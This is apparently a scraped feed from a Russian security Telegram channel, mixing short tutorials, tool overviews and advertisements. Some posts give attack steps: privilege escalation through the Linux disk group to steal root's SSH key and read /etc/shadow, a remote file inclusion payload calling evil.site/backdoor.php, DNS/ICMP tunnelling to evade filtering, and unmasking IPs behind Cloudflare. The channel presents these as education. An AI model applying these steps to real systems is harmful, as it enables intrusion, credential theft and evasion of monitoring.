22.04.202513:09
Argus: Крутая разведка с Python
👋
⏺Что это такое: Argus — это универсальный recon-инструмент, заточенный под сбор информации о сетях, веб-приложениях и системах безопасности. Под капотом — удобный интерфейс, куча встроенных модулей и гибкая архитектура. Всё, что нужно, чтобы начать разведку — в одном месте.
⏺Чем крут: Он отлично подходит как для быстрого сканирования, так и для глубокого анализа. Вывод читаемый, результаты — сразу готовы к работе. Работает гибко, не перегружен, легко настраивается под стиль конкретного специалиста.
ZeroDay | #Инструмент
👋
Приветствую в мире цифровой безопасности!
Поговорим о еще одном инструменте безопасности.
⏺Что это такое: Argus — это универсальный recon-инструмент, заточенный под сбор информации о сетях, веб-приложениях и системах безопасности. Под капотом — удобный интерфейс, куча встроенных модулей и гибкая архитектура. Всё, что нужно, чтобы начать разведку — в одном месте.
⏺Чем крут: Он отлично подходит как для быстрого сканирования, так и для глубокого анализа. Вывод читаемый, результаты — сразу готовы к работе. Работает гибко, не перегружен, легко настраивается под стиль конкретного специалиста.
ZeroDay | #Инструмент


18.04.202514:00
Shift Left Security: думаем о безопасности с первого дня
👋
⏺Что это вообще такое: это не инструмент и не фреймворк, а идея — внедрять практики безопасности на самых ранних стадиях разработки. Не после деплоя, не когда баг уже в проде, а прямо на этапе написания кода, проектирования, коммитов и CI/CD.
⏺Как это работает:
1️⃣Разработчики проверяют безопасность кода до ревью — например, с помощью SAST (анализ кода).
2️⃣Тесты безопасности запускаются в CI/CD как обязательный этап.
3️⃣Принципы безопасности учитываются уже при проектировании архитектуры.
4️⃣Dev и Sec работают вместе: никакой “передачки” задач на тестеров и админов.
5️⃣Любой pull request — это потенциальная проверка на баги и уязвимости.
⏺Чем пользоваться: Инструменты типа Snyk, SonarQube, Checkov — всё, что можно встроить в CI/CD. Плюс GitHub Actions, Git hooks и постоянное моделирование угроз.
ZeroDay | #безопасность
👋
Приветствую в мире цифровой безопасности!
Сегодня расскажу не про уязвимость, а про подход, который помогает их избежать - Shift Left Security.
⏺Что это вообще такое: это не инструмент и не фреймворк, а идея — внедрять практики безопасности на самых ранних стадиях разработки. Не после деплоя, не когда баг уже в проде, а прямо на этапе написания кода, проектирования, коммитов и CI/CD.
⏺Как это работает:
1️⃣Разработчики проверяют безопасность кода до ревью — например, с помощью SAST (анализ кода).
2️⃣Тесты безопасности запускаются в CI/CD как обязательный этап.
3️⃣Принципы безопасности учитываются уже при проектировании архитектуры.
4️⃣Dev и Sec работают вместе: никакой “передачки” задач на тестеров и админов.
5️⃣Любой pull request — это потенциальная проверка на баги и уязвимости.
⏺Чем пользоваться: Инструменты типа Snyk, SonarQube, Checkov — всё, что можно встроить в CI/CD. Плюс GitHub Actions, Git hooks и постоянное моделирование угроз.
ZeroDay | #безопасность
16.04.202516:39
Повышение привилегий через группу disk в Linux
👋
⏺В чем суть: Если юзер состоит в группе disk, он может взаимодействовать с устройствами хранения — в частности, с основным диском
⏺Сценарий атаки на пальцах:
1️⃣Создаем пользователя raj и добавляем его в элитную группу disk:
2️⃣Включаем SSH-доступ для root (не забудьте про PermitRootLogin yes и PubkeyAuthentication yes).
3️⃣Подключаемся как raj, проверяем диск и открываем debugfs:
4️⃣Копируем приватный ключ, даем ему нужные права и входим в систему уже как root:
5️⃣Дальше по вкусу: читаем /etc/shadow, выкачиваем хэши, устраиваем барбекю.
⏺Почему это реально опасно: Это не баг, это фича, которой можно злоупотребить. Особенно если кто-то случайно или по глупости добавил пользователя в disk. А на обычных десктопах или в dev-средах это бывает вполне себе часто.
ZeroDay | #атака
👋
Приветствую в мире цифровой безопасности!
Сегодня разберем довольно недооцененную технику эскалации прав в Linux — через группу disk.
⏺В чем суть: Если юзер состоит в группе disk, он может взаимодействовать с устройствами хранения — в частности, с основным диском
/dev/sda
. Это значит, что он может читать (а иногда и писать!) в файловую систему напрямую — например, достать id_rsa root-пользователя.⏺Сценарий атаки на пальцах:
1️⃣Создаем пользователя raj и добавляем его в элитную группу disk:
adduser raj
2️⃣Включаем SSH-доступ для root (не забудьте про PermitRootLogin yes и PubkeyAuthentication yes).
3️⃣Подключаемся как raj, проверяем диск и открываем debugfs:
debugfs /dev/sda3
4️⃣Копируем приватный ключ, даем ему нужные права и входим в систему уже как root:
chmod 600 id_rsa
5️⃣Дальше по вкусу: читаем /etc/shadow, выкачиваем хэши, устраиваем барбекю.
⏺Почему это реально опасно: Это не баг, это фича, которой можно злоупотребить. Особенно если кто-то случайно или по глупости добавил пользователя в disk. А на обычных десктопах или в dev-средах это бывает вполне себе часто.
ZeroDay | #атака


03.04.202510:35
Вебинар для всех, кто работает с персональными данными
8 апреля в 16:00 Selectel проведет вебинар, где разберут:
- как компаниям, которые обрабатывают персональные данные, соответствовать 152-ФЗ,
- кто определяет уровень защищенности компании и как его проверить самостоятельно.
По итогам вебинара участникам отправят чек-лист вопросов для облачного провайдера по требованиям 152-ФЗ.
Мероприятие бесплатное. Посмотреть программу и зарегистрироваться можно по ссылке: https://slc.tl/3fr4c
Чтобы не пропустить вебинар и узнавать о других митапах, воркшопах и бесплатных курсах Selectel, подписывайтесь на @selectel_events
Реклама. АО “Селектел”, ИНН: 7810962785. ERID: 2Vtzqv6d3ig
8 апреля в 16:00 Selectel проведет вебинар, где разберут:
- как компаниям, которые обрабатывают персональные данные, соответствовать 152-ФЗ,
- кто определяет уровень защищенности компании и как его проверить самостоятельно.
По итогам вебинара участникам отправят чек-лист вопросов для облачного провайдера по требованиям 152-ФЗ.
Мероприятие бесплатное. Посмотреть программу и зарегистрироваться можно по ссылке: https://slc.tl/3fr4c
Чтобы не пропустить вебинар и узнавать о других митапах, воркшопах и бесплатных курсах Selectel, подписывайтесь на @selectel_events
Реклама. АО “Селектел”, ИНН: 7810962785. ERID: 2Vtzqv6d3ig


30.03.202514:42
Редтимим мониторинг: рекон Grafana
Grafana — это не простой инструмент для анализа данных, а порой и уязвимая точка входа в корпоративную сеть. Получив доступ, хакеры могут обойти защиту и расширить атаку в сети. А это уже неприятно, да? 🙄
⏺В статье рассказано, как использовали Grafana для сканирования портов, SSRF-атак и обхода авторизации с помощью брутфорса.
ZeroDay | #Статья
Grafana — это не простой инструмент для анализа данных, а порой и уязвимая точка входа в корпоративную сеть. Получив доступ, хакеры могут обойти защиту и расширить атаку в сети. А это уже неприятно, да? 🙄
⏺В статье рассказано, как использовали Grafana для сканирования портов, SSRF-атак и обхода авторизации с помощью брутфорса.
ZeroDay | #Статья


27.03.202516:09
Fastflux: как быстро уходить от блокировок?
👋
⏺Что такое Fast Flux: это техника, которую используют хакеры, скрывая свои вредоносные серверы, постоянно меняя их IP-адреса. И да, этот способ делает их сайты и ботнеты сложными для обнаружения и блокировки.
3 столпа, на которых держится fastflux
1️⃣Частая смена IP-адресов — суть метода в том, что DNS-записи обновляются буквально каждую минуту, что делает сайт или сервер трудноуловимым.
2️⃣Сеть заражённых устройств — вместо одного сервера злоумышленники используют целую армию заражённых машин, которые перенаправляют трафик, маскируя источник атаки.
3️⃣Двухуровневый Fast Flux — это более сложная версия, в которой не только конечные серверы, но и промежуточные узлы меняют IP-адреса, создавая почти невидимую инфраструктуру.
⏺Как вы поняли, Fast Flux делает блокировку вредоносных сайтов ну сильно запарнее — как только заблокирован один IP, хакеры тут же переключают трафик на новый.
⏺Как защититься: Начнем с анализа DNS-записей и трафика на необычные изменения. Ну и не забываем подключать методы блокировки, которые учитывают поведение сети — они помогут быстрее поймать кого нужно.
ZeroDay | #fastflux
👋
Приветствую в мире цифровой безопасности!
Расскажу, как работает Fast Flux.
⏺Что такое Fast Flux: это техника, которую используют хакеры, скрывая свои вредоносные серверы, постоянно меняя их IP-адреса. И да, этот способ делает их сайты и ботнеты сложными для обнаружения и блокировки.
3 столпа, на которых держится fastflux
1️⃣Частая смена IP-адресов — суть метода в том, что DNS-записи обновляются буквально каждую минуту, что делает сайт или сервер трудноуловимым.
2️⃣Сеть заражённых устройств — вместо одного сервера злоумышленники используют целую армию заражённых машин, которые перенаправляют трафик, маскируя источник атаки.
3️⃣Двухуровневый Fast Flux — это более сложная версия, в которой не только конечные серверы, но и промежуточные узлы меняют IP-адреса, создавая почти невидимую инфраструктуру.
⏺Как вы поняли, Fast Flux делает блокировку вредоносных сайтов ну сильно запарнее — как только заблокирован один IP, хакеры тут же переключают трафик на новый.
⏺Как защититься: Начнем с анализа DNS-записей и трафика на необычные изменения. Ну и не забываем подключать методы блокировки, которые учитывают поведение сети — они помогут быстрее поймать кого нужно.
ZeroDay | #fastflux


21.04.202514:17
Расследование: как фальшивые DNS-записи крадут ваши данные, а вы и не замечаете
Вы вводите URL любимого сайта, но попадаете на его идеальную копию, созданную мошенниками. Что, если DNS-система работает против вас? Подмены записей, отравление кэша и атаки через MITM — все это может привести к краже ваших данных: от паролей до криптокошельков.
⏺В статье — детальное разъяснение того, как хакеры юзают уязвимости в DNS для кражи данных, а также как можно защититься от подобных атак и избежать фишинга.
ZeroDay | #Статья
Вы вводите URL любимого сайта, но попадаете на его идеальную копию, созданную мошенниками. Что, если DNS-система работает против вас? Подмены записей, отравление кэша и атаки через MITM — все это может привести к краже ваших данных: от паролей до криптокошельков.
⏺В статье — детальное разъяснение того, как хакеры юзают уязвимости в DNS для кражи данных, а также как можно защититься от подобных атак и избежать фишинга.
ZeroDay | #Статья
18.04.202511:01
Открыли прием заявок на Pentest award 2025!
Это отраслевая награда для специалистов по тестированию на проникновение, которую ежегодно вручает компания Авилликс. Основная задача премии — выделить лучших специалистов и показать их вклад в развитие российского пентеста.
Участие в премии бесплатное, прием заявок продлиться до 30 июня.
🏆Главный приз за победу — стеклянная именная статуэтка, макбук и максимальный почет сообщества этичных хакеров.
🏅За вторые и третьи места призеры получат айфоны и смарт-часы.
⚡️Также будут подарки от партнеров проекта: Совкомбанк Технологии и BIZONE Bug Bounty, гранты от учебного центра CyberEd и билеты на конференцию OFFZONЕ. Церемония награждения будет проходить 1 августа в Москве.
Заявка на премию — это рассказ о лучшем проекте в свободной форме. Не нужно раскрывать эксплоиты, любые шаги в цепочке эксплуатации могут быть полностью анонимны, а детали могут быть скрыты, важно отразить сам подход и идею.
Подать заявку и узнать больше информации можно на сайте — https://award.awillix.ru/
Реклама. ООО «Авилликс». erid:2VtzqwqwHdt
Это отраслевая награда для специалистов по тестированию на проникновение, которую ежегодно вручает компания Авилликс. Основная задача премии — выделить лучших специалистов и показать их вклад в развитие российского пентеста.
Участие в премии бесплатное, прием заявок продлиться до 30 июня.
🏆Главный приз за победу — стеклянная именная статуэтка, макбук и максимальный почет сообщества этичных хакеров.
🏅За вторые и третьи места призеры получат айфоны и смарт-часы.
⚡️Также будут подарки от партнеров проекта: Совкомбанк Технологии и BIZONE Bug Bounty, гранты от учебного центра CyberEd и билеты на конференцию OFFZONЕ. Церемония награждения будет проходить 1 августа в Москве.
Заявка на премию — это рассказ о лучшем проекте в свободной форме. Не нужно раскрывать эксплоиты, любые шаги в цепочке эксплуатации могут быть полностью анонимны, а детали могут быть скрыты, важно отразить сам подход и идею.
Подать заявку и узнать больше информации можно на сайте — https://award.awillix.ru/
Реклама. ООО «Авилликс». erid:2VtzqwqwHdt
Reposted from:
Codeby



14.04.202510:40
Друзья, уже сегодня в 19:00 по МСК пройдет бесплатный вебинар, где мы разберем, как обычный планшет или смартфон можно превратить в мощный инструмент для пентеста!
Что будет на вебинаре?
🔴 Покажем, как развернуть Kali Linux/Nethunter и использовать его для реальных задач.
Спикер: Андрей Бирюков
🌟 CISSP, 15+ лет в ИБ
🌟 Руководитель защиты АСУ ТП
🌟 Автор 4 книг и 200+ статей по кибербезопасности
Сегодня в 19:00 по МСК — бонусы для всех участников. 🔴 Регистрируйтесь здесь и получите ссылку на эфир и подарок в ответном письме.
🚀 По всем вопросам пишите @Codeby_Academy
Что будет на вебинаре?
🔴 Покажем, как развернуть Kali Linux/Nethunter и использовать его для реальных задач.
Спикер: Андрей Бирюков
🌟 CISSP, 15+ лет в ИБ
🌟 Руководитель защиты АСУ ТП
🌟 Автор 4 книг и 200+ статей по кибербезопасности
Сегодня в 19:00 по МСК — бонусы для всех участников. 🔴 Регистрируйтесь здесь и получите ссылку на эфир и подарок в ответном письме.
🚀 По всем вопросам пишите @Codeby_Academy
01.04.202515:40
Расширенная маскировка трафика: ESNI, V2Ray и Covert Channels
Часть 2
👋
⏺ESNI против SNI-фильтрации: Когда подключаетесь к сайту по HTTPS, провайдер все равно видит домен через SNI (Server Name Indication). Так можно легко заблокировать целые сайты, даже если у вас VPN или прокси.
⏺И тут Encrypted SNI (ESNI) решает проблему, зашифровывая эту информацию. На Cloudflare ESNI включается прямо в браузере:
• Открываем about:config в Firefox
• Ищем network.security.esni.enabled
• Ставим true
⏺V2Ray: превращаем трафик в обычный веб: Shadowsocks хорош, но его можно обнаружить. V2Ray позволяет маскировать соединения, превращая их в обычные HTTP-запросы.
Устанавливаем V2Ray на сервер:
Настраиваем config.json:
⏺Covert Channels: передача данных в неожиданных местах: Что если DPI фильтрует вообще все, кроме разрешенного трафика? Можно передавать данные там, где их ну точно не ждут:
1️⃣ICMP туннелинг (DNSCat2) — прячем трафик в пингах
2️⃣DNS туннелинг (iodine) — передаем данные через DNS-запросы
3️⃣HTTP(S) covert channel — запаковываем полезную нагрузку в GET/POST-запросы
Пример ICMP-туннеля:
На клиенте:
ZeroDay | #маскировкатрафика
Часть 2
👋
Приветствую в мире цифровой безопасности!
Сегодня разберем, как усилить маскировку с помощью ESNI, V2Ray и скрытых каналов передачи данных.
⏺ESNI против SNI-фильтрации: Когда подключаетесь к сайту по HTTPS, провайдер все равно видит домен через SNI (Server Name Indication). Так можно легко заблокировать целые сайты, даже если у вас VPN или прокси.
⏺И тут Encrypted SNI (ESNI) решает проблему, зашифровывая эту информацию. На Cloudflare ESNI включается прямо в браузере:
• Открываем about:config в Firefox
• Ищем network.security.esni.enabled
• Ставим true
⏺V2Ray: превращаем трафик в обычный веб: Shadowsocks хорош, но его можно обнаружить. V2Ray позволяет маскировать соединения, превращая их в обычные HTTP-запросы.
Устанавливаем V2Ray на сервер:
bash <(curl -L https://install.direct/go.sh)
Настраиваем config.json:
{
⏺Covert Channels: передача данных в неожиданных местах: Что если DPI фильтрует вообще все, кроме разрешенного трафика? Можно передавать данные там, где их ну точно не ждут:
1️⃣ICMP туннелинг (DNSCat2) — прячем трафик в пингах
2️⃣DNS туннелинг (iodine) — передаем данные через DNS-запросы
3️⃣HTTP(S) covert channel — запаковываем полезную нагрузку в GET/POST-запросы
Пример ICMP-туннеля:
sudo apt install iodine
На клиенте:
iodine -f 10.0.0.1 mydomain.com
ZeroDay | #маскировкатрафика


30.03.202509:15
😈ТОП 3 канала для тех, кто увлекается хакингом и ИБ:
Этичный Хакер — крупнейший в СНГ канал по информационной безопасности.
Архив Безопасника — полезные github-инструменты для пентеста, сетевой разведки, xss, криптографии.
Не хакинг, а ИБ — канал для хакеров, которые не хотят попасть за решетку. OSINT, CTF, пентест, социальная инженерия.
Этичный Хакер — крупнейший в СНГ канал по информационной безопасности.
Архив Безопасника — полезные github-инструменты для пентеста, сетевой разведки, xss, криптографии.
Не хакинг, а ИБ — канал для хакеров, которые не хотят попасть за решетку. OSINT, CTF, пентест, социальная инженерия.
25.03.202515:00
Настройка фаервола в Windows через PowerShell
👋
⏺Встроенный фаервол — это удобный инструмент для блокировки нежеланных соединений. Но вдруг хотите более точной настройки, тогда и можно использовать PowerShell и его модуль NetSecurity. Он дает доступ вообще ко всем возможностям брандмауэра, от создания новых правил до их удаления.
⏺Запуск модуля NetSecurity: Чтобы приступить к настройке, нужно сначала подключить модуль NetSecurity:
⏺Смотрим текущие правила: сейчас, когда уже модуль подключен, давайте узнаем, какие правила уже стоят в системе. Для этого используем команду:
И вот вам обзор: сколько правил, какие включены, какой трафик блокируется. Если захотите подробности по каждому правилу, можно получить все параметры:
⏺Создаем новое правило: Теперь сделаем реально полезную штуку — заблокируем WINS. Для этого создаем правило, которое блокирует входящий трафик:
⏺Изменяем существующее правило: Если захотите поменять действие у уже настроенного правила, например, разрешить WINS, используем команду:
Вот теперь WINS снова работает.
⏺Удаляем ненужные правила: Если старое правило вам больше не нужно, удаляем его:
⏺Удаление сразу нескольких правил: Еще один лайфхак — удалить несколько правил сразу. Например, все отключенные правила:
ZeroDay | #firewall #powershell
👋
Приветствую в мире цифровой безопасности!
Сегодня поговорим о том, как можно настроить фаервол в Windows через PowerShell
⏺Встроенный фаервол — это удобный инструмент для блокировки нежеланных соединений. Но вдруг хотите более точной настройки, тогда и можно использовать PowerShell и его модуль NetSecurity. Он дает доступ вообще ко всем возможностям брандмауэра, от создания новых правил до их удаления.
⏺Запуск модуля NetSecurity: Чтобы приступить к настройке, нужно сначала подключить модуль NetSecurity:
Import-Module -Name 'NetSecurity'
⏺Смотрим текущие правила: сейчас, когда уже модуль подключен, давайте узнаем, какие правила уже стоят в системе. Для этого используем команду:
Get-NetFirewallRule | Select-Object DisplayName, Enabled, Direction, Action -First 10
И вот вам обзор: сколько правил, какие включены, какой трафик блокируется. Если захотите подробности по каждому правилу, можно получить все параметры:
Get-NetFirewallRule | Select-Object * -First 1
⏺Создаем новое правило: Теперь сделаем реально полезную штуку — заблокируем WINS. Для этого создаем правило, которое блокирует входящий трафик:
$Params = @{
⏺Изменяем существующее правило: Если захотите поменять действие у уже настроенного правила, например, разрешить WINS, используем команду:
$Params = @{
Вот теперь WINS снова работает.
⏺Удаляем ненужные правила: Если старое правило вам больше не нужно, удаляем его:
Remove-NetFirewallRule -DisplayName "Block WINS"
⏺Удаление сразу нескольких правил: Еще один лайфхак — удалить несколько правил сразу. Например, все отключенные правила:
Remove-NetFirewallRule -Enabled 'False'
ZeroDay | #firewall #powershell
19.04.202511:30
- Наверное, он думает о других женщинах
- Я закрыл ту zero-day уязвимость или это мне приснилось?
ZeroDay | #мем
- Я закрыл ту zero-day уязвимость или это мне приснилось?
ZeroDay | #мем


17.04.202512:00
📝 Как работает Remote File Inclusion (RFI)
Всё начинается с безобидного параметра в URL — сайт хочет подключить нужную страницу. Но он же может подключить чужую, вместо своей 🧐
⏺Веб-приложение получает запрос вроде:
⏺Но фильтрации нет. И теперь можно подставить ссылку на внешний файл:
⏺Сервер, ничего не подозревая, скачивает внешний PHP-файл и исполняет его как часть своего кода.
⏺Этот код может делать всё: красть данные, открывать удалённый доступ, ставить бекдоры — потому что он запускается от имени сервера.
⏺Пока юзер думает, что пользуется сайтом — на сервере уже работает чужой сценарий.
ZeroDay | #атака
Всё начинается с безобидного параметра в URL — сайт хочет подключить нужную страницу. Но он же может подключить чужую, вместо своей 🧐
⏺Веб-приложение получает запрос вроде:
?page=about.php
— и просто включает указанный файл.⏺Но фильтрации нет. И теперь можно подставить ссылку на внешний файл:
?page=https://evil.site/backdoor.php
⏺Сервер, ничего не подозревая, скачивает внешний PHP-файл и исполняет его как часть своего кода.
⏺Этот код может делать всё: красть данные, открывать удалённый доступ, ставить бекдоры — потому что он запускается от имени сервера.
⏺Пока юзер думает, что пользуется сайтом — на сервере уже работает чужой сценарий.
ZeroDay | #атака


04.04.202509:00
PrintNightmare: неприятная уязвимость в Windows
👋
⏺PrintNightmare — уязвимость в службе Print Spooler в Windows, которая может привести к удалённому выполнению кода на вашем устройстве. Да, это именно та служба, что управляет задачами на печать, и её уязвимость открывает доступ по сути ко всей вашей системе. Звучит страшно, верно?😦
⏺Как это работает?
1️⃣Хакер настраивает SMB-соединение с уязвимой системой и выполняет RPC-запросы.
2️⃣После этого он добавляет вредоносный драйвер, который содержит ссылку на DLL-библиотеку.
3️⃣Windows загружает эту библиотеку, предоставляя хакеру доступ к системе.
⏺В чем опасность: Print Spooler, как мы уже обсудили, играет супер важную роль в работе системы, а её уязвимость позволяет обходить многие защиты. Патчи и обновления — это, конечно, важно, но эта опасность все же продолжает оставаться на горизонте, и новые способы атак могут быть уже на подходе.
ZeroDay | #fastflux
👋
Приветствую в мире цифровой безопасности!
Сегодня поговорим про уязвимость PrintNightmare.
⏺PrintNightmare — уязвимость в службе Print Spooler в Windows, которая может привести к удалённому выполнению кода на вашем устройстве. Да, это именно та служба, что управляет задачами на печать, и её уязвимость открывает доступ по сути ко всей вашей системе. Звучит страшно, верно?😦
⏺Как это работает?
1️⃣Хакер настраивает SMB-соединение с уязвимой системой и выполняет RPC-запросы.
2️⃣После этого он добавляет вредоносный драйвер, который содержит ссылку на DLL-библиотеку.
3️⃣Windows загружает эту библиотеку, предоставляя хакеру доступ к системе.
⏺В чем опасность: Print Spooler, как мы уже обсудили, играет супер важную роль в работе системы, а её уязвимость позволяет обходить многие защиты. Патчи и обновления — это, конечно, важно, но эта опасность все же продолжает оставаться на горизонте, и новые способы атак могут быть уже на подходе.
ZeroDay | #fastflux
Reposted from:
Codeby



01.04.202512:40
📣 БЕСПЛАТНЫЙ ВЕБИНАР WAPT & SQLiM: взламываем веб как профессионалы
Настоящий пентест — это не только сканеры, но и глубокий анализ, ручная эксплуатация и работа с эксплоитами. Покажем на практике, как это делают эксперты!
Ждем вас 3 апреля 19:00 (МСК). Регистрация здесь.
Что разберём:
🔸 Поиск уязвимостей через фаззинг
🔸 Реальные SQL- и командные инъекции (с выводом RCE)
🔸 Эскалация привилегий после взлома
🔸 Разбор похожих задач из курсов WAPT и SQLiM
Бонусы для участников:
✅ Доступ к записи
✅ Чек-лист "ТОП-5 ошибок в пентесте веба"
✅ Подарок для всех зрителей!
Спикер: Александр Медведев 😎
🔴 OSWE, OSCP, CWAPT, SQLIM и др., 3х-кратный победитель Standoff
🔴 Опыт в пентестах — 12+ лет
🚀 Трудности с регистрацией? Пишите @Codeby_Academy
Настоящий пентест — это не только сканеры, но и глубокий анализ, ручная эксплуатация и работа с эксплоитами. Покажем на практике, как это делают эксперты!
Ждем вас 3 апреля 19:00 (МСК). Регистрация здесь.
Что разберём:
🔸 Поиск уязвимостей через фаззинг
🔸 Реальные SQL- и командные инъекции (с выводом RCE)
🔸 Эскалация привилегий после взлома
🔸 Разбор похожих задач из курсов WAPT и SQLiM
Бонусы для участников:
✅ Доступ к записи
✅ Чек-лист "ТОП-5 ошибок в пентесте веба"
✅ Подарок для всех зрителей!
Спикер: Александр Медведев 😎
🔴 OSWE, OSCP, CWAPT, SQLIM и др., 3х-кратный победитель Standoff
🔴 Опыт в пентестах — 12+ лет
🚀 Трудности с регистрацией? Пишите @Codeby_Academy


25.03.202512:00
🚩Ищите красные флаги — и это не про отношения
Selectel подготовил CTF-задачи для специалистов по кибербезопасности и предлагает вам решить их. Вы потренируете не только навыки криптографии и разработки, но и почувствуете себя настоящим детективом, ведь некоторые задачи закручены хитроумнее, чем преступления в книгах Агаты Кристи.
🔎 Шпионские штучки
Наконец, вам удалось перехватить трафик, в котором должен быть ключ к адресу одной секретной службы. Вы почти у цели, осталось разобрать дамп и следовать верным маршрутом.
🔎 Приглашение на ИБ-вечеринку
Специалисты по ИБ закатили праздник, но без специального ключа на него не попасть. Отыщите этот ключ, пока веселье еще в разгаре!
🔎 Тир на открытом воздухе
Звучит заманчиво, но только не в ветреную погоду. Попробуйте выстрелить точно в яблочко, чтобы получить награду.
Для каждой задачи уже готово решение, так что можно сразу проверить себя.
Реклама. АО “Селектел”, ИНН: 7810962785. ERID: 2VtzqvmPPVA
Selectel подготовил CTF-задачи для специалистов по кибербезопасности и предлагает вам решить их. Вы потренируете не только навыки криптографии и разработки, но и почувствуете себя настоящим детективом, ведь некоторые задачи закручены хитроумнее, чем преступления в книгах Агаты Кристи.
🔎 Шпионские штучки
Наконец, вам удалось перехватить трафик, в котором должен быть ключ к адресу одной секретной службы. Вы почти у цели, осталось разобрать дамп и следовать верным маршрутом.
🔎 Приглашение на ИБ-вечеринку
Специалисты по ИБ закатили праздник, но без специального ключа на него не попасть. Отыщите этот ключ, пока веселье еще в разгаре!
🔎 Тир на открытом воздухе
Звучит заманчиво, но только не в ветреную погоду. Попробуйте выстрелить точно в яблочко, чтобы получить награду.
Для каждой задачи уже готово решение, так что можно сразу проверить себя.
Реклама. АО “Селектел”, ИНН: 7810962785. ERID: 2VtzqvmPPVA
18.04.202515:30
🎉 Результаты розыгрыша:
🏆 Победители:
1. ivanterner (@ivanterner)
2. Len4r | ᏀᏒᎬᎻ (@undertaker_gpt)
3. Andrei (@a_vasiukou)
4. Ivan (@Lord_Voron)
✔️Проверить результаты
🏆 Победители:
1. ivanterner (@ivanterner)
2. Len4r | ᏀᏒᎬᎻ (@undertaker_gpt)
3. Andrei (@a_vasiukou)
4. Ivan (@Lord_Voron)
✔️Проверить результаты


17.04.202509:00
Весенний релиз Staffcop Enterprise 5.6
Когда?
🕓 24 апреля в 11:00 мск обсудим обновления продукта, которые упрощают расследования и защищают данные в новых сценариях.
Что будет?
— Покажем, как защититься от утечек через фотографирование экрана.
— Расскажем, как эффективно использовать Staffcop в связке с Контур.Доступом для оперативного реагирования и более глубокого расследования инцидентов.
— Продемонстрируем обновление краулера для поиска и работы с файлами на компьютерах сотрудников.
Для кого?
⚡️Вебинар будет полезен как непосредственным пользователям системы, так и всем, кто заинтересован в обеспечении информационной безопасности в организации.
Ждем вас на вебинаре, чтобы узнать о развитии продукта и задать вопросы спикерам.
➡️ Зарегистрироваться
Реклама. ООО «АТОМ БЕЗОПАСНОСТЬ», ИНН 5408298569, ОГРН 1125476195459 erid:2SDnjdHupfn
Когда?
🕓 24 апреля в 11:00 мск обсудим обновления продукта, которые упрощают расследования и защищают данные в новых сценариях.
Что будет?
— Покажем, как защититься от утечек через фотографирование экрана.
— Расскажем, как эффективно использовать Staffcop в связке с Контур.Доступом для оперативного реагирования и более глубокого расследования инцидентов.
— Продемонстрируем обновление краулера для поиска и работы с файлами на компьютерах сотрудников.
Для кого?
⚡️Вебинар будет полезен как непосредственным пользователям системы, так и всем, кто заинтересован в обеспечении информационной безопасности в организации.
Ждем вас на вебинаре, чтобы узнать о развитии продукта и задать вопросы спикерам.
➡️ Зарегистрироваться
Реклама. ООО «АТОМ БЕЗОПАСНОСТЬ», ИНН 5408298569, ОГРН 1125476195459 erid:2SDnjdHupfn
04.04.202508:00
Обзор рынка информационной безопасности за 2024 год 🛡
«Инфосистемы Джет» представила результаты обзора рынка информационной безопасности. Рынок кибербезопасности в России находится на этапе динамичного развития, ориентированного на обеспечение реальной защищенности бизнес-процессов и непрерывности бизнеса. В обзоре указаны направления, которые пользуются наибольшим спросом, а также продемонстрирована динамика этого спроса.
➡️ Основные выводы и ключевые цифры — в карточках, а полную версию обзора можно найти здесь.
«Инфосистемы Джет» представила результаты обзора рынка информационной безопасности. Рынок кибербезопасности в России находится на этапе динамичного развития, ориентированного на обеспечение реальной защищенности бизнес-процессов и непрерывности бизнеса. В обзоре указаны направления, которые пользуются наибольшим спросом, а также продемонстрирована динамика этого спроса.
➡️ Основные выводы и ключевые цифры — в карточках, а полную версию обзора можно найти здесь.
31.03.202510:00
CloudFail: как обойти защиту Cloudflare и раскрыть скрытые IP
👋
⏺CloudFail — ну это прямо подарок для пентестеров. Он использует старые БД и уязвимые DNS-записи, чтобы выявить реальные IP, скрытые за защитой Cloudflare. И да, всё это делается через Tor, так что с анонимностью все ок 🤫
⏺Как работает:
1️⃣Ищет уязвимости в DNS-записях через DNSDumpster.
2️⃣Проверяет IP-адреса в базе Crimeflare — это утечка старых данных.
3️⃣Перебирает более 2500 субдоменов, используя метод брутфорса.
⏺Что нового: В форке исправлены старые ошибки с API, добавлена возможность генерировать отчёты и выводить IP в удобном списке.
ZeroDay | #Инструмент
👋
Приветствую в мире цифровой безопасности!
Поговорим о еще одном инструменте безопасности.
⏺CloudFail — ну это прямо подарок для пентестеров. Он использует старые БД и уязвимые DNS-записи, чтобы выявить реальные IP, скрытые за защитой Cloudflare. И да, всё это делается через Tor, так что с анонимностью все ок 🤫
⏺Как работает:
1️⃣Ищет уязвимости в DNS-записях через DNSDumpster.
2️⃣Проверяет IP-адреса в базе Crimeflare — это утечка старых данных.
3️⃣Перебирает более 2500 субдоменов, используя метод брутфорса.
⏺Что нового: В форке исправлены старые ошибки с API, добавлена возможность генерировать отчёты и выводить IP в удобном списке.
ZeroDay | #Инструмент
28.03.202514:00
Маскирование трафика с Cloudflare, DNS over HTTPS (DoH) и Shadowsocks
👋
⏺Зачем это нужно: Если ваш трафик мониторится Deep Packet Inspection (DPI) или ограничивается провайдерами, то стандартные VPN и прокси могут не сработать. DoH + Shadowsocks помогают скрывать трафик, обходить блокировки и не палиться.
⏺Включаем DoH (DNS over HTTPS): Чтобы скрыть DNS-запросы от провайдера и DPI, включаем DoH с серверами Cloudflare (
Настраиваем Cloudflare DoH в systemd-resolved:
Добавляем:
Применяем настройки:
⏺Поднимаем Shadowsocks и тем самым скрываем реальный трафик. Shadowsocks не просто шифрует трафик — он делает его похожим на обычный HTTPS, обходя DPI. Устанавливаем сервер Shadowsocks:
Открываем конфиг
Запускаем сервер:
⏺Скрываем IP за Cloudflare: Теперь трафик зашифрован, но IP-сервер все еще виден. Тут нужен cloudflare. Сначала добавляем домен в Cloudflare и включаем Proxy Mode. И далее активируем Argo Tunnel, чтобы трафик шел через Cloudflare без прямого IP-соединения:
ZeroDay | #redteam #маскировкатрафика
👋
Приветствую в мире цифровой безопасности!
Сегодня разберем, как можно замаскировать трафик при Red Team-операциях и не только.
⏺Зачем это нужно: Если ваш трафик мониторится Deep Packet Inspection (DPI) или ограничивается провайдерами, то стандартные VPN и прокси могут не сработать. DoH + Shadowsocks помогают скрывать трафик, обходить блокировки и не палиться.
⏺Включаем DoH (DNS over HTTPS): Чтобы скрыть DNS-запросы от провайдера и DPI, включаем DoH с серверами Cloudflare (
1.1.1.1
). Проверяем, поддерживает ли система DoH:resolvectl status
Настраиваем Cloudflare DoH в systemd-resolved:
sudo nano /etc/systemd/resolved.conf
Добавляем:
[Resolve]
